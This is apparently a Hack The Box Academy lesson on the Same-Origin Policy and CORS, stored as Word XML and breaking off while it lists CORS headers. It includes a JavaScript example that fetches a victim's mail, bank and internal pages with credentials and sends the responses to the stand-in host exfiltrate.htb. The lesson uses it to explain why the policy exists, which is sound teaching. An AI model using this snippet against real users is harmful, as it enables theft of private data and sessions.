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Same-Origin Policy &amp; CORS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fully understand defenses against CSRF attacks and how to bypass them, we first need to discuss the </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Same-Origin Policy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cross-Origin Resource Sharing (CORS)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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What is the Same-Origin Policy?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Same-Origin policy is a security mechanism implemented in web browsers to prevents cross-origin access to websites. In particular, JavaScript code running on one origin cannot access a different origin. This prevents a malicious site from exfiltrating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">information from other origins and restricts the type of requests it can make to other origins.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origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (refer to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="https://datatracker.ietf.org/doc/html/rfc6454" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">RFC 6454</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more on the concept) is defined as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scheme</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host</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port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a URL. The Same-Origin policy applies whenever two URLs differ in at least one of these three properties. For instance, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> site and an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> site have different origins due to the difference in scheme. Furthermore, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://academy.hackthebox.com</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https://hackthebox.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> also have different origins due to the difference in hosts. On the other hand, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://hackthebox.com</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https://hackthebox.com:443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> share the same origin, as the scheme, host, and port match (the default port of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 443).</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Given that web browsers implement the Same-Origin policy, vulnerabilities and bugs within their software can lead to bypasses, resulting in potentially high-severity security vulnerabilities.</w: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Without the Same-Origin Policy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understand why the Same-Origin policy is crucial to web security, let us imagine a scenario where it does not exist.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Assume that upon visiting the malicious website </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exploitationserver.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our private laptop in our home network, it executes the following JavaScript code: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Code: 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&lt;script&gt;     async function exfiltrate_data(url) {         // get data         const response = await fetch(url, {credentials: "include"});         const data = await response.text();          // exfiltrate data         await fetch("https://exfiltrate.htb/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exfiltrate?c=" + btoa(data));     }      // exfiltrate mails     exfiltrate_data("https://mymails.htb/getmails");      // exfiltrate bank data     exfiltrate_data("https://mybank.htb/myaccounts");      // exfiltrate internal service     exfiltrate_data("ht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tps://192.168.178.5/"); &lt;/script&gt;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JavaScript code on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exploitationserver.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes three fetch requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://mymails.htb/getmails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https://mybank.htb/myaccounts</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https://192.168.178.5/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from our browser. If we are logged in to any of these sites, our browser will potentially send our session cookies along with these requests, depending on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie configuration. This makes these requests authenticated. The JavaScript code then exfiltrates the response by sending it back to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exfiltrate.htb/exfiltrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This way, the attacker running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exfiltrate.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtains the response to the three authenticated GET requests from our user account, enabling the attacker to access our emails on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://mymails.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, our bank details and account balance on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://mybank.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and even our wiki running in our home internal network on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://192.168.178.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is not publicly accessible but can only be reached from the local network).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is a significant security violation, and we can do nothing to prevent this from happening. The Same-Origin policy is specifically designed to mitigate this issue.</w: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With the Same-Origin Policy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As discussed above, the Same-Origin policy blocks access across origins. In the above case, the origin of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exploitationserver.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> differs from all three origins attacked by the malicious website due to the different host. Thus, the call to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a different origin raises an error in the browser caused by the Same-Origin policy, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://exploitationserver.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is unable to access and exfiltrate the data:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="80755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84958" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId12"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="8075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63.59pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId12"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Understanding that the Same-Origin policy stops https://exploitationserver.htb from only accessing the response to the cross-origin request is crucial. The (potentially authenticated) request itself is still sent. We can confirm this in Burp. Note the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin</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Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers indicating that it is indeed a cross-origin request:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="15209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00497" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId13"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="15209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119.76pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId13"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behavior can lead to CSRF attacks since the request is not held back.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There are certain exceptions to the Same-Origin policy. For instance, we can include resources such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">img</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video</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script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags cross-origins. For example, even though it is loaded cross-origins, we can include Hack The Box Academy's logo on a website we own using the following HTML code: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Code: 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html&gt;&lt;html&gt;     &lt;body&gt;         &lt;script&gt;             var img = document.createElement("img");             img.setAttribute("src", "https://academy.hackthebox.com/images/logo.svg");             document.body.appendChild(img);         &lt;/script&gt;     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/body&gt;&lt;/html&gt;</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What is CORS?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Cross-Origin Resource Sharing (CORS) is a W3C standard to define exceptions in the Same-Origin policy. This enables an origin to define a list of trusted origins and HTTP methods to allow across origins.</w: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Why do we need CORS?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understand why we need CORS, let us assume the following scenario, which is common in the real world: a web application hosted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> displays data. To do so, it talks to an API hosted on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://api.vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. More specifically, the application running on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> consists of only the front-end code, which fetches data from the API. The API implements a simple REST API consisting of endpoints to create, read, update, and delete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allows for a simple front-end web application that does not need to handle any logic regarding the data. In particular, the front-end code handles the interaction with the API, for which it can use JavaScript code similar to the following so all data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is fetched once the site is loaded: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Code: javascript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fetch datafetch("http://api.vulnerablesite.htb/data", {  method: "GET"}).then((response) =&gt; {return response.json();}).then((data) =&gt; {// add to DOM&lt;SNIP&gt;})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However, as discussed above, this violates the Same-Origin policy since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://vulnerablesite.htb</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http://api.vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are different origins. As such, the above JavaScript code results in an error, and the data is not loaded properly:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="50148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3874" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId14"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="5014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39.49pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId14"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Now, let us discuss how CORS works and what a web application can do to talk to an API without errors caused by the Same-Origin policy.</w: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How does CORS work?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web server can configure exceptions to the Same-Origin policy via CORS by setting any of the following CORS headers in the HTTP response (we will discuss </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preflight requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> later):</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hyperlink r:id="rId15" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Allow-Origin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: define Same-Origin policy exceptions for a specific origin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hyperlink r:id="rId16" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Expose-Headers" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Expose-Headers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: define Same-Origin policy exceptions for specific HTTP headers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hyperlink r:id="rId17" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Methods" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Allow-Methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: define Same-Origin policy exceptions for allowed HTTP methods in response to a preflight request</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hyperlink r:id="rId18" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Headers" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Allow-Headers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: define Same-Origin policy exceptions for allowed HTTP headers in response to a preflight request</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hyperlink r:id="rId19" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Allow-Credentials</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: if set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
